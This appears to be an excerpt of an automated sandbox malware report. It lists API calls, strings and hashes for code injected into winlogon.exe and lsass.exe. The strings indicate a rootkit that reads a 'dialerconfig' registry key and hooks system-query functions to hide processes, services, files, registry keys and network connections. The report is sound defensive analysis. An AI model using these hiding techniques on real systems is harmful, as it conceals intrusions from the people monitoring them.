Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd

Similarity

API ID: Valuetry_get_function
String ID: FlsSetValue
API String ID: 738293619-3750699315
Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction ID: e7db87f7a35c98745af35ace1be3c6e53bac379613e017ee2811a5807a647cc3
Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction Fuzzy Hash: C4E09269304E50B1EB088BDCF80C6A56363FBC8B83F58D022DA1906365CE38C855C700

Function 00000225DC641D60 Relevance: 5.1, APIs: 4, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000225DC641D9B
HeapAlloc.KERNEL32 ref: 00000225DC641DAA
GetProcessHeap.KERNEL32 ref: 00000225DC641E1E
HeapFree.KERNEL32 ref: 00000225DC641E2C

Memory Dump Source

Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction ID: 033f51fa4fbd303eb701596ecc85ecdd0deee511843dda6ace5587389423011c
Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction Fuzzy Hash: C021A77A618FA091EB218FADE40825AF7A0FB88F95F158120DE8D47B24EF78C543C700

Function 00000225DC6A1D60 Relevance: 5.1, APIs: 4, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000225DC6A1D9B
HeapAlloc.KERNEL32 ref: 00000225DC6A1DAA
GetProcessHeap.KERNEL32 ref: 00000225DC6A1E1E
HeapFree.KERNEL32 ref: 00000225DC6A1E2C

Memory Dump Source

Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction ID: 7f3c580e7f6acc78a1b324a506cbe828dcca390cb46b98e836b6ffd308063445
Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction Fuzzy Hash: 6B21952A704FA0D1EB11CF9DE40825AF3A5FB84B96F158124DE8C87B24EF78C542C700

Function 00000225DC641274 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000225DC64127A
HeapAlloc.KERNEL32 ref: 00000225DC641289
GetProcessHeap.KERNEL32 ref: 00000225DC6412A3
HeapAlloc.KERNEL32 ref: 00000225DC6412B4

Memory Dump Source

Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction ID: e260d4879ccdd16d2670f1e3a98160fb33c08bdd2834f05f7ee2a4984eaa195b
Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction Fuzzy Hash: 07E09AB5A21A10D6E7288FBAD80834A36E1FB8CF02F58C434C90907360DF7D84DACB80

Function 00000225DC6A1274 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000225DC6A127A
HeapAlloc.KERNEL32 ref: 00000225DC6A1289
GetProcessHeap.KERNEL32 ref: 00000225DC6A12A3
HeapAlloc.KERNEL32 ref: 00000225DC6A12B4

Memory Dump Source

Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction ID: bd58b1467632bf9a15e0b0447b9297be9f2b07fc24b7c5a056ce1b31617e21fe
Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction Fuzzy Hash: C2E0E5B5B11A10D6E7089FAAD81835A76EAFB88F53F49C024C94D07360DF7D949ACB90

Analysis Process: lsass.exePID: 628, Parent PID: 5796COMMON

Execution Graph

Execution Coverage:	1.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	124
Total number of Limit Nodes:	13

Executed Functions

Function 00000202C0AE26F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileType.KERNEL32 ref: 00000202C0AE27D4
StrCpyW.SHLWAPI ref: 00000202C0AE27ED

Strings

\\.\pipe\, xrefs: 00000202C0AE27DF

Memory Dump Source

Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction ID: 69e20323056a9615f1253612b4b675ef762144682d8232d5f9ea75a0753cbd44
Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction Fuzzy Hash: BE71AE322047C1C6FB289B2699DC3AEA795F754B84F461017DFA947B8BDE35CA288700

Function 00000202C0AE21CC Relevance: 4.7, APIs: 1, Strings: 2, Instructions: 164
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrCmpNIW.SHLWAPI ref: 00000202C0AE2270

Part of subcall function 00000202C0AE30B4: GetProcessHeap.KERNEL32 ref: 00000202C0AE30D7
Part of subcall function 00000202C0AE30B4: HeapAlloc.KERNEL32 ref: 00000202C0AE30EA
Part of subcall function 00000202C0AE30B4: StrCmpNIW.SHLWAPI ref: 00000202C0AE316B
Part of subcall function 00000202C0AE30B4: GetProcessHeap.KERNEL32 ref: 00000202C0AE31D1
Part of subcall function 00000202C0AE30B4: HeapFree.KERNEL32 ref: 00000202C0AE31DF

Strings

dialer, xrefs: 00000202C0AE2269
S, xrefs: 00000202C0AE2391

Memory Dump Source

Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: S$dialer
API String ID: 756756679-3873981283
Opcode ID: a6338c422d047c8eae01fcbeb907d454b031cf1b87c932ac2c197f7c23e38add
Instruction ID: 25fb4c50494745b03f6fbfcc80ee10dbaa90343c0eba2f6fdf05f69e3cf436e3
Opcode Fuzzy Hash: a6338c422d047c8eae01fcbeb907d454b031cf1b87c932ac2c197f7c23e38add
Instruction Fuzzy Hash: C051D132B107A5C6FB60CF66988C6AD63E4F744794F069413EFA527B86DB38C869C710

Function 00000202C0AE1650 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 00000202C0AE165B
HeapAlloc.KERNEL32 ref: 00000202C0AE166A

Part of subcall function 00000202C0AE1274: GetProcessHeap.KERNEL32 ref: 00000202C0AE127A
Part of subcall function 00000202C0AE1274: HeapAlloc.KERNEL32 ref: 00000202C0AE1289
Part of subcall function 00000202C0AE1274: GetProcessHeap.KERNEL32 ref: 00000202C0AE12A3
Part of subcall function 00000202C0AE1274: HeapAlloc.KERNEL32 ref: 00000202C0AE12B4

RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE16DA
RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE1707
RegCloseKey.ADVAPI32 ref: 00000202C0AE1721
RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE1741
RegCloseKey.ADVAPI32 ref: 00000202C0AE175C
RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE177C
RegCloseKey.ADVAPI32 ref: 00000202C0AE1797
RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE17B7
RegCloseKey.ADVAPI32 ref: 00000202C0AE17D2
RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE17F2
RegCloseKey.ADVAPI32 ref: 00000202C0AE180D
RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE182D
RegCloseKey.ADVAPI32 ref: 00000202C0AE1848
RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE1868
RegCloseKey.ADVAPI32 ref: 00000202C0AE1883
RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE18A3
RegCloseKey.ADVAPI32 ref: 00000202C0AE18BE
RegCloseKey.ADVAPI32 ref: 00000202C0AE18C8

Part of subcall function 00000202C0AE12C8: RegQueryInfoKeyW.ADVAPI32 ref: 00000202C0AE1326
Part of subcall function 00000202C0AE12C8: GetProcessHeap.KERNEL32 ref: 00000202C0AE1334
Part of subcall function 00000202C0AE12C8: HeapAlloc.KERNEL32 ref: 00000202C0AE1345
Part of subcall function 00000202C0AE12C8: RegEnumValueW.ADVAPI32 ref: 00000202C0AE13A1
Part of subcall function 00000202C0AE12C8: GetProcessHeap.KERNEL32 ref: 00000202C0AE13E9
Part of subcall function 00000202C0AE12C8: HeapAlloc.KERNEL32 ref: 00000202C0AE13F7
Part of subcall function 00000202C0AE12C8: GetProcessHeap.KERNEL32 ref: 00000202C0AE141B
Part of subcall function 00000202C0AE12C8: HeapFree.KERNEL32 ref: 00000202C0AE1429
Part of subcall function 00000202C0AE12C8: lstrlenW.KERNEL32 ref: 00000202C0AE1432
Part of subcall function 00000202C0AE12C8: GetProcessHeap.KERNEL32 ref: 00000202C0AE1440
Part of subcall function 00000202C0AE12C8: HeapAlloc.KERNEL32 ref: 00000202C0AE144E

Strings

service_names, xrefs: 00000202C0AE17EB
tcp_remote, xrefs: 00000202C0AE1861
udp, xrefs: 00000202C0AE189C
startup, xrefs: 00000202C0AE16FD
tcp_local, xrefs: 00000202C0AE1826
pid, xrefs: 00000202C0AE173A
process_names, xrefs: 00000202C0AE1775
SOFTWARE\dialerconfig, xrefs: 00000202C0AE16BA
paths, xrefs: 00000202C0AE17B0

Memory Dump Source

Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd

Similarity

API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 106492572-2879589442
Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction ID: 4aaa1fbf0e72b96de9cac81fd4f7ab81f2ee325bf3078e55ecff6abc8cc10923
Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction Fuzzy Hash: F671F577710B90C5FB109F66E89C69D27A4FB98B88F421123DB8E47A2ADE39C459C740

Function 00000202C0AE1AB8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 00000202C0AE1AD8
StrCmpNIW.SHLWAPI ref: 00000202C0AE1AF2
lstrlenW.KERNEL32 ref: 00000202C0AE1B01
StrCpyW.SHLWAPI ref: 00000202C0AE1B16

Strings

\\?\, xrefs: 00000202C0AE1AE6

Memory Dump Source

Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction ID: 2e3fad50795f7a0079a38e66a231913a676bdedf83bff55786a910ba4333ad1d
Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction Fuzzy Hash: 0DF03C73304781D2FB608B25E4DC39D6760F754B88F858023CB894A956DE7DC68CCB00

Function 00000202C0AE3458 Relevance: 4.5, APIs: 3, Instructions: 43
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 00000202C0AE347A
PathFindFileNameW.SHLWAPI ref: 00000202C0AE3489

Part of subcall function 00000202C0AE3930: StrCmpNIW.SHLWAPI ref: 00000202C0AE3948

Part of subcall function 00000202C0AE3878: GetModuleHandleW.KERNEL32 ref: 00000202C0AE3886
Part of subcall function 00000202C0AE3878: GetCurrentProcess.KERNEL32 ref: 00000202C0AE38B4
Part of subcall function 00000202C0AE3878: VirtualProtectEx.KERNEL32 ref: 00000202C0AE38D6
Part of subcall function 00000202C0AE3878: GetCurrentProcess.KERNEL32 ref: 00000202C0AE38F4
Part of subcall function 00000202C0AE3878: VirtualProtectEx.KERNEL32 ref: 00000202C0AE3915

CreateThread.KERNEL32 ref: 00000202C0AE34D7

Part of subcall function 00000202C0AE1EB4: GetCurrentThread.KERNEL32 ref: 00000202C0AE1EBF

Memory Dump Source

Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd

Similarity

API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
String ID:
API String ID: 1683269324-0
Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction ID: 235a7f768eb8c3ab9d0458457c1d5a34f9fd9f592f8dc39969e1513678aacc8f
Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction Fuzzy Hash: 3F118073618781C2F721D721B8CE76D2291BB54706F471027ABA6893D7EF3EC0AC8254

Function 00000202C0AE1C28 Relevance: 3.1, APIs: 2, Instructions: 68
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00000202C0AE1650: GetProcessHeap.KERNEL32 ref: 00000202C0AE165B
Part of subcall function 00000202C0AE1650: HeapAlloc.KERNEL32 ref: 00000202C0AE166A
Part of subcall function 00000202C0AE1650: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE16DA
Part of subcall function 00000202C0AE1650: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE1707
Part of subcall function 00000202C0AE1650: RegCloseKey.ADVAPI32 ref: 00000202C0AE1721
Part of subcall function 00000202C0AE1650: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE1741
Part of subcall function 00000202C0AE1650: RegCloseKey.ADVAPI32 ref: 00000202C0AE175C
Part of subcall function 00000202C0AE1650: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE177C
Part of subcall function 00000202C0AE1650: RegCloseKey.ADVAPI32 ref: 00000202C0AE1797
Part of subcall function 00000202C0AE1650: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE17B7
Part of subcall function 00000202C0AE1650: RegCloseKey.ADVAPI32 ref: 00000202C0AE17D2
Part of subcall function 00000202C0AE1650: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE17F2

Sleep.KERNEL32 ref: 00000202C0AE1C43
SleepEx.KERNELBASE ref: 00000202C0AE1C49

Part of subcall function 00000202C0AE1650: RegCloseKey.ADVAPI32 ref: 00000202C0AE180D
Part of subcall function 00000202C0AE1650: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE182D
Part of subcall function 00000202C0AE1650: RegCloseKey.ADVAPI32 ref: 00000202C0AE1848
Part of subcall function 00000202C0AE1650: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE1868
Part of subcall function 00000202C0AE1650: RegCloseKey.ADVAPI32 ref: 00000202C0AE1883
Part of subcall function 00000202C0AE1650: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE18A3
Part of subcall function 00000202C0AE1650: RegCloseKey.ADVAPI32 ref: 00000202C0AE18BE
Part of subcall function 00000202C0AE1650: RegCloseKey.ADVAPI32 ref: 00000202C0AE18C8

Memory Dump Source

Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd

Similarity

API ID: CloseOpen$HeapSleep$AllocProcess
String ID:
API String ID: 1534210851-0
Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction ID: da309ec870f8e9d4d5b5b498153ffb026461c589e783c2c4c55ac16aa4ae19b4
Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction Fuzzy Hash: 8F310E36300BA5D1FB509F36DEDD36E12A6AB44FC0F064023DFA987697EE24C8798250

Function 00000202C0AB2908 Relevance: 1.7, APIs: 1, Instructions: 186
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 00000202C0AB2A31

Memory Dump Source

Source File: 00000008.00000002.3012950284.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_202c0ab0000_lsass.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction ID: fe811162bf7b14930204ab85ca965a1531c7317894ac0595a7362860ab0b9f73
Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction Fuzzy Hash: 5E61FC32701351C7FA68CF2A948CB6DB3A1FB04BA4F568027DB1907786DB38E856C704

Non-executed Functions

Function 00000202C0AE2CDC Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 00000202C0AE2D80
lstrlenW.KERNEL32 ref: 00000202C0AE2FBA

Part of subcall function 00000202C0AE1A14: OpenProcess.KERNEL32 ref: 00000202C0AE1A3A
Part of subcall function 00000202C0AE1A14: K32GetModuleFileNameExW.KERNEL32 ref: 00000202C0AE1A58
Part of subcall function 00000202C0AE1A14: PathFindFileNameW.SHLWAPI ref: 00000202C0AE1A67
Part of subcall function 00000202C0AE1A14: lstrlenW.KERNEL32 ref: 00000202C0AE1A73
Part of subcall function 00000202C0AE1A14: StrCpyW.SHLWAPI ref: 00000202C0AE1A86
Part of subcall function 00000202C0AE1A14: CloseHandle.KERNEL32 ref: 00000202C0AE1A94

GetProcAddress.KERNEL32 ref: 00000202C0AE2D95

Part of subcall function 00000202C0AE1554: StrCmpIW.SHLWAPI ref: 00000202C0AE1585

Part of subcall function 00000202C0AE3930: StrCmpNIW.SHLWAPI ref: 00000202C0AE3948

StrCmpNIW.SHLWAPI ref: 00000202C0AE2DD8
lstrlenW.KERNEL32 ref: 00000202C0AE2F00

Strings

NtQueryObject, xrefs: 00000202C0AE2D8B
\Device\Nsi, xrefs: 00000202C0AE2DCB
ntdll.dll, xrefs: 00000202C0AE2D79

Memory Dump Source

Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction ID: 3357ed6314eabba8fa08e2096083bcb3f05f8c0f1971a8852dd6ac07c7fe1732
Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction Fuzzy Hash: 5CB17B62210B90C2FB689F25D48C7AD63A4FB84B84F565017EFAA53796DF35CDA8C340

Function 00000202C0AE7E70 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00000202C0AE7E8C
RtlCaptureContext.NTDLL ref: 00000202C0AE7EB9
RtlLookupFunctionEntry.NTDLL ref: 00000202C0AE7ED3
RtlVirtualUnwind.NTDLL ref: 00000202C0AE7F14
IsDebuggerPresent.KERNEL32 ref: 00000202C0AE7F68
SetUnhandledExceptionFilter.KERNEL32 ref: 00000202C0AE7F89
UnhandledExceptionFilter.KERNEL32 ref: 00000202C0AE7F94

Memory Dump Source

Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction ID: 1c79aad55ccd82dee0190766b37111c65c1eb97836056699a6b1e1d23cddf3b8
Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction Fuzzy Hash: 05310473205B80DAEB609F60E8887EE6364F794744F45442BDB9E47A9AEF38C658C710

Function 00000202C0AEB50C Relevance: 9.1, APIs: 6, Instructions: 83COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 00000202C0AEB585
RtlLookupFunctionEntry.NTDLL ref: 00000202C0AEB59D
RtlVirtualUnwind.NTDLL ref: 00000202C0AEB5D8
IsDebuggerPresent.KERNEL32 ref: 00000202C0AEB611
SetUnhandledExceptionFilter.KERNEL32 ref: 00000202C0AEB61B
UnhandledExceptionFilter.KERNEL32 ref: 00000202C0AEB626

Memory Dump Source

Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction ID: 6b269ed75a72be8ab7d7467a3451bbe869e7fbdbfaf4ff46492a360364212acb
Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction Fuzzy Hash: 1D314C33214B80C6EB60DF25E88879E73A4F788754F510127EBAD47B96EF38C5598B00

Function 00000202C0AEFEF8 Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00000202C0AEFF67
WriteFile.KERNEL32 ref: 00000202C0AF021E
WriteFile.KERNEL32 ref: 00000202C0AF0270
GetLastError.KERNEL32 ref: 00000202C0AF0372
GetLastError.KERNEL32 ref: 00000202C0AF03D2

Memory Dump Source

Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd

Similarity

API ID: ErrorFileLastWrite$ConsoleOutput
String ID:
API String ID: 1443284424-0
Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction ID: a9daa23172fa6c5d4a107eaeca965a46feea8aae7f9fb40a412d1826de46df25
Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction Fuzzy Hash: 3FE1CB33A04B80DAF710CB66D4886DD7BB1F345788F158217EF9A57B9ADA39C51AC700

Function 00000202C0AE12C8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 00000202C0AE1326
GetProcessHeap.KERNEL32 ref: 00000202C0AE1334
HeapAlloc.KERNEL32 ref: 00000202C0AE1345
RegEnumValueW.ADVAPI32 ref: 00000202C0AE13A1

Part of subcall function 00000202C0AE1554: StrCmpIW.SHLWAPI ref: 00000202C0AE1585

GetProcessHeap.KERNEL32 ref: 00000202C0AE13E9
HeapAlloc.KERNEL32 ref: 00000202C0AE13F7
GetProcessHeap.KERNEL32 ref: 00000202C0AE141B
HeapFree.KERNEL32 ref: 00000202C0AE1429
lstrlenW.KERNEL32 ref: 00000202C0AE1432
GetProcessHeap.KERNEL32 ref: 00000202C0AE1440
HeapAlloc.KERNEL32 ref: 00000202C0AE144E
StrCpyW.SHLWAPI ref: 00000202C0AE1470
GetProcessHeap.KERNEL32 ref: 00000202C0AE1485
HeapFree.KERNEL32 ref: 00000202C0AE1493

Strings

d, xrefs: 00000202C0AE1365

Memory Dump Source

Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction ID: f78ac25c8aa7bdd24b278013f40ef6e62fb5d5911618730387ce5f21f02b6c5f
Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction Fuzzy Hash: FB514973218B94D2FB14DB62E58C39EB3A1F788B84F458226DB9947B55DF39C069C700

Function 00000202C0AE1EB4 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 00000202C0AE1EBF

Part of subcall function 00000202C0AE2174: GetModuleHandleA.KERNEL32 ref: 00000202C0AE218C
Part of subcall function 00000202C0AE2174: GetProcAddress.KERNEL32 ref: 00000202C0AE219D

Part of subcall function 00000202C0AE5C10: GetCurrentThreadId.KERNEL32 ref: 00000202C0AE5C4B

Strings

advapi32.dll, xrefs: 00000202C0AE1F97, 00000202C0AE1FB8
NtDeviceIoControlFile, xrefs: 00000202C0AE1FF6
sechost.dll, xrefs: 00000202C0AE1FD9
NtQuerySystemInformation, xrefs: 00000202C0AE1EE5
NtEnumerateKey, xrefs: 00000202C0AE1F59
NtQueryDirectoryFile, xrefs: 00000202C0AE1F1F
EnumServicesStatusExW, xrefs: 00000202C0AE1FB1, 00000202C0AE1FD2
NtQueryDirectoryFileEx, xrefs: 00000202C0AE1F3C
NtResumeThread, xrefs: 00000202C0AE1F02
NtEnumerateValueKey, xrefs: 00000202C0AE1F76
EnumServiceGroupW, xrefs: 00000202C0AE1F90
ntdll.dll, xrefs: 00000202C0AE1ECD

Memory Dump Source

Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd

Similarity

API ID: CurrentThread$AddressHandleModuleProc
String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
API String ID: 4175298099-1975688563
Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction ID: 08831ba54b4148c0853c6b321da8959b0ede21d7b4f39930bbab190b657904fb
Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
